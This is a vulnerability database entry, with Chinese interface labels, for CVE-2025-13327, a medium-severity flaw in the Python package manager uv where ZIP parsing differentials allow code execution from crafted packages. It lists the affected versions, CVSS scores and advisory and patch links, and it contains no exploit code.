CVE-2025-13327
MEDIUM6.3EPSS 0.01%uv has ZIP payload obfuscation through parsing differentials
發布日:2025/10/29修改日:2026/3/4
描述
A flaw was found in uv. This vulnerability allows an attacker to execute malicious code during package resolution or installation via specially crafted ZIP (Zipped Information Package) archives that exploit parsing differentials, requiring user interaction to install an attacker-controlled package.
受影響套件(2)
- crates.io/uvfrom 0, < 0.9.6
- PyPI/uvfrom 0, < 0.9.6
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | MEDIUM6.3 | CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H |
參考連結(6)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2025-13327
- PATCHhttps://github.com/astral-sh/uv
- WEBhttps://access.redhat.com/security/cve/CVE-2025-13327
- WEBhttps://bugzilla.redhat.com/show_bug.cgi?id=2407263
- WEBhttps://github.com/astral-sh/uv/commit/da659fee4898a73dbc75070f3e82d49f745e4628
- WEBhttps://github.com/astral-sh/uv/security/advisories/GHSA-pqhf-p39g-3x64